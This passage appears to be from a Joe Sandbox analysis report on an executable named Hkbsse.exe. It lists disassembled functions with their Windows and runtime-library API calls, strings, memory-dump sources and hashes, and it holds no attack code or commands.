GetProcAddress.KERNEL32(00000000,004517AC), ref: 0070FCD0
GetLastError.KERNEL32(?,?,?,00713DED), ref: 0070FCEB
GetLastError.KERNEL32(?,?,?,00713DED), ref: 0070FCF7
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0070FD0D

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: AddressProc$ErrorLast$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorHandleModule
String ID:
API String ID: 1654681794-0
Opcode ID: 3ae5e1761c5e68bf1df0cae86709e1bcb1c39423b3646c192bb872ab5e16c95f
Instruction ID: dd8002306bc54f8d4c0e5478e3acad373b34d2b67e6485f6e9af2ccd93aacdf0
Opcode Fuzzy Hash: 3ae5e1761c5e68bf1df0cae86709e1bcb1c39423b3646c192bb872ab5e16c95f
Instruction Fuzzy Hash: A5016535600315EBE3107BB97D9EBAB36ECAA44752B240536F801D21D3EABCD8448769

Function 00707007 Relevance: 9.3, APIs: 6, Instructions: 336COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 007070D8
std::_Rethrow_future_exception.LIBCPMT ref: 00707129
std::_Rethrow_future_exception.LIBCPMT ref: 00707139
__Mtx_unlock.LIBCPMT ref: 007071DC
__Mtx_unlock.LIBCPMT ref: 007072E2
__Mtx_unlock.LIBCPMT ref: 0070731D

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Rethrow_future_exceptionstd::_
String ID:
API String ID: 1997747980-0
Opcode ID: 9b77889f6880c4c60810f88e4fee8b63d846359222b2684369689af48488a7b1
Instruction ID: 66f16317985ff4a98e8f54c4354a5644d3232a82bc05f08da2944e539432041d
Opcode Fuzzy Hash: 9b77889f6880c4c60810f88e4fee8b63d846359222b2684369689af48488a7b1
Instruction Fuzzy Hash: 6DC1D471D04349DBDB25DFA4C9497AEBBF4AF41300F00872EE916976D1EB39A904CBA1

Function 0072FE56 Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,006F8877,00000000), ref: 0072FE9E
__fassign.LIBCMT ref: 0073007D
__fassign.LIBCMT ref: 0073009A
WriteFile.KERNEL32(?,006F8877,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 007300E2
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00730122
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 007301CE

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID:
API String ID: 4031098158-0
Opcode ID: d81ae7e7ddfce2e99b94c7cab2e13c1e0fd135fc3028c23c2bc8df81f234376b
Instruction ID: 7cc354408d058b0d2e99010c38e8a3809a242e4cf8fb44bde275c81aa3870be7
Opcode Fuzzy Hash: d81ae7e7ddfce2e99b94c7cab2e13c1e0fd135fc3028c23c2bc8df81f234376b
Instruction Fuzzy Hash: A9D1AE75D0025CDFDF15CFA8D890AEDBBB5BF49304F28016AE855BB242E634AE45CB90

Function 0071EAE4 Relevance: 9.1, APIs: 6, Instructions: 117COMMON

Download Yara Rule

APIs

Concurrency::location::_Assign.LIBCMT ref: 0071EB25
Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0071EB2D
Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0071EB57
Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 0071EB60
Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 0071EBE3
Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 0071EBEB

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Context$Base::$GroupInternalScheduleSegment$AssignAvailableConcurrency::location::_DeferredEventMakeProcessor::ReleaseRunnableSchedulerTraceVirtual
String ID:
API String ID: 3929269971-0
Opcode ID: e357eccba9f9281a6441e24871b6c677031b298cf17b8db731c946c7b8307f67
Instruction ID: 8049689e713e323fc79c07ea1a0450453e4bbae8e61a5a6a03a96986cf1bb672
Opcode Fuzzy Hash: e357eccba9f9281a6441e24871b6c677031b298cf17b8db731c946c7b8307f67
Instruction Fuzzy Hash: 81415F79A00619EFCB19DF68C859AADB7B5FF48310F048159E806977D1CB38AE41CF81

Function 0042E87D Relevance: 9.1, APIs: 6, Instructions: 117COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::location::_Assign.LIBCMT ref: 0042E8BE
Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0042E8C6
Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0042E8F0
Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 0042E8F9
Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 0042E97C
Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 0042E984

Memory Dump Source

Source File: 00000015.00000002.4551006254.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.4551006254.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_Hkbsse.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Context$Base::$GroupInternalScheduleSegment$AssignAvailableConcurrency::location::_DeferredEventMakeProcessor::ReleaseRunnableSchedulerTraceVirtual
String ID:
API String ID: 3929269971-0
Opcode ID: e357eccba9f9281a6441e24871b6c677031b298cf17b8db731c946c7b8307f67
Instruction ID: e5b7b2fa93d888bd1bb69b7ad52ab2ebb4dcd56ad972735b2165e0d4f688e56b
Opcode Fuzzy Hash: e357eccba9f9281a6441e24871b6c677031b298cf17b8db731c946c7b8307f67
Instruction Fuzzy Hash: 12418178B00219AFCB09DF65D458A6DB7B1FF48310F40815AE44697391CB38AD41CF85

Function 0071A22D Relevance: 9.1, APIs: 6, Instructions: 73threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::IncrementFixedCoreCount.LIBCONCRT ref: 0071A270

Part of subcall function 0071B767: Concurrency::details::SchedulerProxy::ToggleBorrowedState.LIBCONCRT ref: 0071B7B6

GetCurrentThread.KERNEL32 ref: 0071A27A
Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 0071A286

Part of subcall function 0071058F: Concurrency::details::platform::__GetThreadGroupAffinity.LIBCONCRT ref: 007105A1

Part of subcall function 00710A1B: Concurrency::details::platform::__SetThreadGroupAffinity.LIBCONCRT ref: 00710A22

Concurrency::details::SchedulerProxy::IncrementCoreSubscription.LIBCONCRT ref: 0071A2C9

Part of subcall function 0071B719: SetEvent.KERNEL32(?,?,0071A2CE,0071B062,00000000,?,00000000,0071B062,00000004,0071B70E,?,00000000,?,?,00000000), ref: 0071B75D

Concurrency::details::SchedulerProxy::AddExecutionResource.LIBCONCRT ref: 0071A2D2

Part of subcall function 0071AD48: __EH_prolog3.LIBCMT ref: 0071AD4F
Part of subcall function 0071AD48: List.LIBCONCRT ref: 0071AD7E

Concurrency::details::ExecutionResource::SetAsCurrent.LIBCMT ref: 0071A2E2

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Proxy::Scheduler$AffinityThread$Concurrency::details::platform::__CoreCurrentExecutionGroupHardwareIncrement$Affinity::BorrowedCountEventFixedH_prolog3ListResourceResource::StateSubscriptionToggle
String ID:
API String ID: 2908504212-0
Opcode ID: e8a399636c21c93f54abecb38cd00bd2a0cdd3abe99d6541657663b6aa6b27b5
Instruction ID: 236c3fc70e440b26853037bcd7d849e104a51ac0bd2e341b1711789f43d119ad
Opcode Fuzzy Hash: e8a399636c21c93f54abecb38cd00bd2a0cdd3abe99d6541657663b6aa6b27b5
Instruction Fuzzy Hash: 2621AE31500B14EBCB25EF69D9518AAF3F5BF8C300700495EE442A7691DB78F981CB96

Function 0072513E Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00725135,00723CF6,0070B75C,00462014,?,00000000,0044B2B8,000000FF,?,006F2651,?,?), ref: 0072514C
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0072515A
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00725173
SetLastError.KERNEL32(00000000,?,00725135,00723CF6,0070B75C,00462014,?,00000000,0044B2B8,000000FF,?,006F2651,?,?), ref: 007251C5

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 36b25f35af6998ec4b79c880eb4916be4c2907fdd02cbca714a0b9a79087163e
Instruction ID: 0aba4627fffb359b88915f31f9ac1170c80e62201bd800ae78a1c9739e57411b
Opcode Fuzzy Hash: 36b25f35af6998ec4b79c880eb4916be4c2907fdd02cbca714a0b9a79087163e
Instruction Fuzzy Hash: D201FC3260DF35BEA72517B5BC49B1A2646EB01775720023EF224441E2FFBA4C11D149

Function 0070FE22 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 0070FE30
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 0070FE36
GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 0070FE63
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 0070FE6D
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 0070FE7F
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0070FE95

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error
String ID:
API String ID: 2808382621-0
Opcode ID: e97b62398d98c93c3587756cc98682a42a4027764094f964300bb13895813f72
Instruction ID: 5a6e41e4d0874c1bd8505efab938bcff3f1ab981e9caaf503d54adee17c4fbd1
Opcode Fuzzy Hash: e97b62398d98c93c3587756cc98682a42a4027764094f964300bb13895813f72
Instruction Fuzzy Hash: BF01A235640215EBD720BB76EC49BAF37A8EF41B52B240935F805E25E3DB2CE9048765

Function 00732889 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 171timeCOMMON

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00456758), ref: 007328F3
_free.LIBCMT ref: 007328E1

Part of subcall function 0072AF8C: HeapFree.KERNEL32(00000000,00000000,?,0072F264,?,00000000,?,?,?,0072F28B,?,00000007,?,?,0072F68D,?), ref: 0072AFA2
Part of subcall function 0072AF8C: GetLastError.KERNEL32(?,?,0072F264,?,00000000,?,?,?,0072F28B,?,00000007,?,?,0072F68D,?,?), ref: 0072AFB4

_free.LIBCMT ref: 00732AAD

Strings

XgE, xrefs: 00732A10
XgE, xrefs: 0073289C, 007328A2

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapInformationLastTimeZone
String ID: XgE$XgE
API String ID: 2155170405-1765908331
Opcode ID: b4be35cfaf65d8fa7a0d1c87db151e18c0363e0f38985316fa454ef15cb7fb70
Instruction ID: b8b07db0fc74d4fb0e83f6667692b406486d042bcfeb71528f2d6b5f6c5719ee
Opcode Fuzzy Hash: b4be35cfaf65d8fa7a0d1c87db151e18c0363e0f38985316fa454ef15cb7fb70
Instruction Fuzzy Hash: A5510B71D00219EBEB10EF65DC859AE77BCEF44310F15427AE450B3293EB789D428795

Function 006F8457 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155libraryloaderCOMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(0000011C,?,00462014), ref: 006F84D0
GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 006F8537
GetProcAddress.KERNEL32(00000000), ref: 006F853E

Strings

0B|, xrefs: 006F8516

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProcVersion
String ID: 0B|
API String ID: 3310240892-1087777810
Opcode ID: bb6d2b84c723a80dd7d7a673e4683cb2014cb5339b8864daa81aea7f8fb1b55f
Instruction ID: c09dff3c5cd4bd427348c07afbd8f61e415489fa78441692eb01f635c1f0b5e8
Opcode Fuzzy Hash: bb6d2b84c723a80dd7d7a673e4683cb2014cb5339b8864daa81aea7f8fb1b55f
Instruction Fuzzy Hash: 81511570D00208DFEB24DB68DD497EDBB76EB45310F5042E9E905A72C1EF399E848B95

Function 0072E17A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe, xrefs: 0072E17F

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe
API String ID: 0-4252897491
Opcode ID: 0a5fcc20f1138a9f2873644ac541eee3e021fdd6f7bae41b37ce764f534e5412
Instruction ID: 589c7163a1ec24f3eb7ef42a666307f6c5936afa58fc6a7f670ac8f0096af5ac
Opcode Fuzzy Hash: 0a5fcc20f1138a9f2873644ac541eee3e021fdd6f7bae41b37ce764f534e5412
Instruction Fuzzy Hash: 8921CD71604629EFDB20AF70BC85D6A7BADFF113647108628F825C7191E739EC508BA0

Function 0072B314 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

Strings

n$o, xrefs: 0072B3AE, 0072B3A4

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID:
String ID: n$o
API String ID: 0-2448269911
Opcode ID: 9abb9358dcd3ddc380508ec514d82bb73023dc79706600e3520e5c488b77e48a
Instruction ID: ff612ded41b1f7449526dbec1438643cf2f8646985389c73a3cb08420f85d0fd
Opcode Fuzzy Hash: 9abb9358dcd3ddc380508ec514d82bb73023dc79706600e3520e5c488b77e48a
Instruction Fuzzy Hash: 5F21A232A01739ABCB21CB64BD45B2A3798DF41761F250621FD06A7293D778ED00C6E5

Function 0072A808 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00726B51,?,?,?,?,00727785,?), ref: 0072A80D
_free.LIBCMT ref: 0072A86A
_free.LIBCMT ref: 0072A8A0
SetLastError.KERNEL32(00000000,00462170,000000FF,?,?,00726B51,?,?,?,?,00727785,?), ref: 0072A8AB

Strings

x!F, xrefs: 0072A893

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID: x!F
API String ID: 2283115069-3062043068
Opcode ID: e535b85f6a1f7523708f7efbf604d8e27d0e3fcbfa08d8b8bd71da2eb14a1c01
Instruction ID: abba96610518e7b82c8037eab7e8dee94a3d67f18f266f1f5f66b056ce9c2a10
Opcode Fuzzy Hash: e535b85f6a1f7523708f7efbf604d8e27d0e3fcbfa08d8b8bd71da2eb14a1c01
Instruction Fuzzy Hash: 6511C632604631BBD61227757C89D7A22599BC1771F640235F624971E2EFBE8C078117

Function 0043A5A1 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,?,004368EA,00000000,00000000,?,?,0043751E,004065D9,00000000,00000000), ref: 0043A5A6
_free.LIBCMT ref: 0043A603
_free.LIBCMT ref: 0043A639
SetLastError.KERNEL32(00000000,00000008,000000FF,?,0043751E,004065D9,00000000,00000000), ref: 0043A644

Strings

x!F, xrefs: 0043A62C

Memory Dump Source

Source File: 00000015.00000002.4551006254.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.4551006254.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_Hkbsse.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID: x!F
API String ID: 2283115069-3062043068
Opcode ID: e535b85f6a1f7523708f7efbf604d8e27d0e3fcbfa08d8b8bd71da2eb14a1c01
Instruction ID: 9c149aa86173fbbd0030d3e0a195d136fb2b955210d307f83871c991f90d2b5a
Opcode Fuzzy Hash: e535b85f6a1f7523708f7efbf604d8e27d0e3fcbfa08d8b8bd71da2eb14a1c01
Instruction Fuzzy Hash: B8110A312847047A961123765C46E6B2159DBC9379F24323FFBA4822D1EFAD8C22525F

Function 0072A95F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,0072771F,006F246E), ref: 0072A964
_free.LIBCMT ref: 0072A9C1
_free.LIBCMT ref: 0072A9F7
SetLastError.KERNEL32(00000000,00462170,000000FF,?,0072771F,006F246E), ref: 0072AA02

Strings

x!F, xrefs: 0072A9EA

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID: x!F
API String ID: 2283115069-3062043068
Opcode ID: 20bf2414b9ffb77df04e35f67f1c4be936db27aece0908ff67d9088a44b49df5
Instruction ID: d65b9c40fc62d01dd9d08ad8f11e147391000a729a1f95598a4313802d1a154b
Opcode Fuzzy Hash: 20bf2414b9ffb77df04e35f67f1c4be936db27aece0908ff67d9088a44b49df5
Instruction Fuzzy Hash: 4E112532204B21BFD711277A7C89E7A23599BC1771F660335F264960E1EEAE9C468116

Function 0043A6F8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(00416B17,00416B17,8B18EC83,004374B8,0043AFBE,?,?,0041D39E,00416B17,?,00417A2B,8B18EC84,76230F00), ref: 0043A6FD
_free.LIBCMT ref: 0043A75A
_free.LIBCMT ref: 0043A790
SetLastError.KERNEL32(00000000,00000008,000000FF,?,?,0041D39E,00416B17,?,00417A2B,8B18EC84,76230F00), ref: 0043A79B

Strings

x!F, xrefs: 0043A783

Memory Dump Source

Source File: 00000015.00000002.4551006254.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.4551006254.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_Hkbsse.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID: x!F
API String ID: 2283115069-3062043068
Opcode ID: 20bf2414b9ffb77df04e35f67f1c4be936db27aece0908ff67d9088a44b49df5
Instruction ID: ec4074691b07f72bd5b3f549a11092afdb3275d14d9fee9f318d6143afe4fa88
Opcode Fuzzy Hash: 20bf2414b9ffb77df04e35f67f1c4be936db27aece0908ff67d9088a44b49df5
Instruction Fuzzy Hash: 9411E9312847047AD61123765CC6E6B226ADBCD7B9F24223FFA54822D1EBADCC12415F

Function 0072229B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

StructuredWorkStealingQueue.LIBCMT ref: 007222BB
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 007222CC
StructuredWorkStealingQueue.LIBCMT ref: 00722302
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00722313

Strings

e, xrefs: 007222DD

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: Work$Concurrency::details::ItemItem::QueueStealingStructured
String ID: e
API String ID: 3804418703-4024072794
Opcode ID: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
Instruction ID: 78df3ba4e9aaca67637a5c062d98000259afed37320a8362e5e8bacb6d2240cd
Opcode Fuzzy Hash: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
Instruction Fuzzy Hash: B011A331104124FBCB15DE68E855AAB73A9EF02364B248169EC06DF243DA7DDD03CBA0

Function 00432034 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

StructuredWorkStealingQueue.LIBCMT ref: 00432054
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00432065
StructuredWorkStealingQueue.LIBCMT ref: 0043209B
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 004320AC

Strings

e, xrefs: 00432076

Memory Dump Source

Source File: 00000015.00000002.4551006254.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.4551006254.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_Hkbsse.jbxd

Yara matches

Similarity

API ID: Work$Concurrency::details::ItemItem::QueueStealingStructured
String ID: e
API String ID: 3804418703-4024072794
Opcode ID: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
Instruction ID: c923216e9bfa0ff3ff3672bf3cc7103de8a20d897a4bce70c00b849211ff2859
Opcode Fuzzy Hash: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
Instruction Fuzzy Hash: A611A731100105ABCB1CDE69C64166B73B4AF16364F24D06BEE068F252DBB9DD09CBA9

Function 004248DD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::Cleanup.LIBCONCRT ref: 0042490E

Part of subcall function 004251CF: Concurrency::details::SchedulingNode::~SchedulingNode.LIBCONCRT ref: 004251E9
Part of subcall function 004251CF: Concurrency::details::_NonReentrantLock::_Acquire.LIBCONCRT ref: 00427667
Part of subcall function 004251CF: Concurrency::details::_UnregisterConcRTEventTracing.LIBCONCRT ref: 00427679
Part of subcall function 004251CF: InterlockedPopEntrySList.KERNEL32(00465B38,00000004,Function_000489D0,000000FF), ref: 0042768F

Part of subcall function 0041F3A7: DeleteCriticalSection.KERNEL32(?,0042BB51,B007A738,00000000,?,?,00000000,Function_0004B37B,000000FF,?,0042052C), ref: 0041F3A8

~ListArray.LIBCONCRT ref: 00424950

Part of subcall function 004247AB: InterlockedFlushSList.KERNEL32(?,?,?,00424955,B007A738,?,?,?,Function_000489D0,000000FF), ref: 004247B0
Part of subcall function 004247AB: ListArray.LIBCONCRT ref: 004247B9
Part of subcall function 004247AB: InterlockedFlushSList.KERNEL32(?,00000000,?,?,00424955,B007A738,?,?,?,Function_000489D0,000000FF), ref: 004247C2
Part of subcall function 004247AB: ListArray.LIBCONCRT ref: 004247CB
Part of subcall function 004247AB: ListArray.LIBCONCRT ref: 004247D5

~ListArray.LIBCONCRT ref: 00424958

Part of subcall function 00424825: InterlockedFlushSList.KERNEL32(?,?,?,0042495D,B007A738,?,?,?,Function_000489D0,000000FF), ref: 0042482A
Part of subcall function 00424825: ListArray.LIBCONCRT ref: 00424833
Part of subcall function 00424825: InterlockedFlushSList.KERNEL32(?,00000000,?,?,0042495D,B007A738,?,?,?,Function_000489D0,000000FF), ref: 0042483C
Part of subcall function 00424825: ListArray.LIBCONCRT ref: 00424845
Part of subcall function 00424825: ListArray.LIBCONCRT ref: 0042484F
Part of subcall function 00424825: _InternalDeleteHelper.LIBCONCRT ref: 00424868

Strings

rKB, xrefs: 00424908
OKB, xrefs: 00424986

Memory Dump Source

Source File: 00000015.00000002.4551006254.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.4551006254.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_Hkbsse.jbxd

Yara matches

Similarity

API ID: List$Array$Interlocked$Flush$Concurrency::details::Concurrency::details::_DeleteScheduling$AcquireBase::CleanupConcCriticalEntryEventHelperInternalLock::_NodeNode::~ReentrantSchedulerSectionTracingUnregister
String ID: OKB$rKB
API String ID: 3638618822-2616793421
Opcode ID: 0c9af8e3d83cc23414255d63bc99794984f375fa3166cd08da6f4d8f38899987
Instruction ID: 77cb08d7a2878f5d6c31cfea2a85ce3b56c179720aa5c90e0a110e80ff89d1e5
Opcode Fuzzy Hash: 0c9af8e3d83cc23414255d63bc99794984f375fa3166cd08da6f4d8f38899987
Instruction Fuzzy Hash: 3211B271700951AFD709FB22EC42BD9B7A0FF90318F40412FE426435A1EF387955CA88

Function 004248E2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 53COMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::Cleanup.LIBCONCRT ref: 0042490E

Part of subcall function 004251CF: Concurrency::details::SchedulingNode::~SchedulingNode.LIBCONCRT ref: 004251E9
Part of subcall function 004251CF: Concurrency::details::_NonReentrantLock::_Acquire.LIBCONCRT ref: 00427667
Part of subcall function 004251CF: Concurrency::details::_UnregisterConcRTEventTracing.LIBCONCRT ref: 00427679
Part of subcall function 004251CF: InterlockedPopEntrySList.KERNEL32(00465B38,00000004,Function_000489D0,000000FF), ref: 0042768F

Part of subcall function 0041F3A7: DeleteCriticalSection.KERNEL32(?,0042BB51,B007A738,00000000,?,?,00000000,Function_0004B37B,000000FF,?,0042052C), ref: 0041F3A8

~ListArray.LIBCONCRT ref: 00424950

Part of subcall function 004247AB: InterlockedFlushSList.KERNEL32(?,?,?,00424955,B007A738,?,?,?,Function_000489D0,000000FF), ref: 004247B0
Part of subcall function 004247AB: ListArray.LIBCONCRT ref: 004247B9
Part of subcall function 004247AB: InterlockedFlushSList.KERNEL32(?,00000000,?,?,00424955,B007A738,?,?,?,Function_000489D0,000000FF), ref: 004247C2
Part of subcall function 004247AB: ListArray.LIBCONCRT ref: 004247CB
Part of subcall function 004247AB: ListArray.LIBCONCRT ref: 004247D5

~ListArray.LIBCONCRT ref: 00424958

Part of subcall function 00424825: InterlockedFlushSList.KERNEL32(?,?,?,0042495D,B007A738,?,?,?,Function_000489D0,000000FF), ref: 0042482A
Part of subcall function 00424825: ListArray.LIBCONCRT ref: 00424833
Part of subcall function 00424825: InterlockedFlushSList.KERNEL32(?,00000000,?,?,0042495D,B007A738,?,?,?,Function_000489D0,000000FF), ref: 0042483C
Part of subcall function 00424825: ListArray.LIBCONCRT ref: 00424845
Part of subcall function 00424825: ListArray.LIBCONCRT ref: 0042484F
Part of subcall function 00424825: _InternalDeleteHelper.LIBCONCRT ref: 00424868

Strings

rKB, xrefs: 00424908
OKB, xrefs: 00424986

Memory Dump Source

